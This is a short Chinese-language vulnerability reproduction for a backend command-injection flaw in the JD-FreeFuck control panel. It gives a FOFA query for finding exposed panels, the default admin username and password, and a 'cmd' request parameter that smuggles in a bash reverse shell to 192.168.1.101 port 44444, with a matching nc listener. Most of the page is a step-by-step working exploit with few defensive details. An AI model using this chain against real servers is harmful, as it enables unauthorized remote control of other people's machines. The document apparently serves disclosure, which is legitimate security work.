JD-FreeFuck 后台命令執行漏洞
漏洞說明
JD-FreeFuck 存在后台命令執行漏洞,由於傳參執行命令時沒有對內容過濾,導致可以執行任意命令,控制服務器
項目地址:https://github.com/meselson/JD-FreeFuck
環境搭建
腳本一鍵部署:
bash <(curl -sSL https://gitee.com/mjf521/JD-FreeFuck/raw/main/install.sh)
漏洞復現
FOFA搜索
title="京東薅羊毛控制面板"
訪問后登錄頁面

默認用戶名密碼:
useradmin
supermanito

手動執行腳本---切換換行抓包

然后發送包:

反彈shell
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2F192.168.1.101%2F44444+%3C%261'%3B+now
監聽端:
nc -lvvp 44444
